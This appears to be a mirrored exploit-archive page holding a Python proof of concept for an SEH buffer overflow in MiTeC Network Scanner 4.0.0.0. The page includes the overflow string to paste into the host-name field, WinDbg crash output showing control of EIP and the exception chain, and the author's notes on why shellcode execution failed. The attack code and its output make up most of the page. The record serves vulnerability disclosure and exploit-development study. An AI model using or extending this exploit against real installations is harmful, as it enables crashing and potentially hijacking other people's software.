首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Network Scanner Version 4.0.0.0 - SEH Crash POC
来源:http://binsect00.tistory.com 作者:INSECT.B 发布时间:2016-02-16  
#-*- coding: utf-8 -*-
#
# Exploit Title: Network Scanner Version 4.0.0.0  SEH Crash POC
# POC Dork: N/A
# Date: 2016-02-15
# Author: INSECT.B
#   Twitter : @INSECT.B
#   Facebook : https://www.facebook.com/B.INSECT00
#   Blog : http://binsect00.tistory.com
# Vendor Homepage: http://www.mitec.cz/
# Software Link: http://www.mitec.cz/Downloads/NetScan.zip
# Version: 4.0.0.0
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
  
'''
[+] Type : SEH
[-] Insert the string that compile this file in [TOOLS] Tab 'Detect IP from Host name...' field
[-] string : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAÌÌÌÌBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
[-] crash info
(2d0.878): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=42424242 edx=772571cd esi=00000000 edi=00000000
eip=42424242 esp=0012edd8 ebp=0012edf8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
42424242 ??              ???
 
0:000> !exchain
0012edec: ntdll!ExecuteHandler2+3a (772571cd)
0012f534: 42424242
Invalid exception stack at cccccccc
 
0:000> d 12f534
0012f534  cc cc cc cc 42 42 42 42-43 43 43 43 43 43 43 43  ....BBBBCCCCCCCC
0012f544  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f554  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f564  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f574  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f584  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f594  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f5a4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0:000> d
0012f5b4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f5c4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f5d4  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012f5e4  43 43 43 00 95 b4 31 74-84 f6 12 00 00 00 00 00  CCC...1t........
0012f5f4  0a 80 00 00 ea 01 24 00-00 00 00 00 00 00 00 00  ......$.........
0012f604  ab 00 0a e7 34 f6 12 00-e7 c4 06 77 ea 01 24 00  ....4......w..$.
0012f614  15 02 00 00 00 00 00 00-00 00 00 00 15 02 00 00  ................
0012f624  cd ab ba dc 00 00 00 00-84 f6 12 00 15 02 00 00  ................
 
 
'''
 
import struct
 
junk1 = "A" * 76
nSEH = "\xcc\xcc\xcc\xcc"
SEH = "BBBB"
shell = "C" * 300
 
payload = junk1 + nSEH + SEH + shell
with open("netEx.txt","wb") as f :
    f.write(payload)
print payload
 
"""
Exploit problem
 
1. Input string(value) was replaced '0x3f' in the memory. then shellcode should be encoded to alpha_mixed.
   Buffer size was 171 bytes. but, encoded shellcode size was over 600 bytes.
 
2. Null byte cannot be inserted into Input field. so we can't use SEH pointer in a range of NetScanner.exe address (0x00400000~0x008c3000)
 
3. payload was consisted of  'junk - shellcode - nSEH ptr - SEH ptr'. but this step was fail. because junk buffer size was 76 bytes.
   Can't insert shellcode
 
"""
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Windows - AFD.SYS Da
·Inductive Automation Ignition
·JMX2 Email Tester Remote Shell
·Inductive Automation Ignition
·Delta Industrial Automation DC
·XM Easy Personal FTP Server 5.
·Wieland wieplan 4.1 Document P
·STIMS Buffer - Buffer Overflow
·D-Link DCS-930L Authenticated
·STIMS Cutter - Buffer Overflow
·Microsoft Windows WebDAV - BSo
·QuickHeal 16.00 - webssx.sys D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved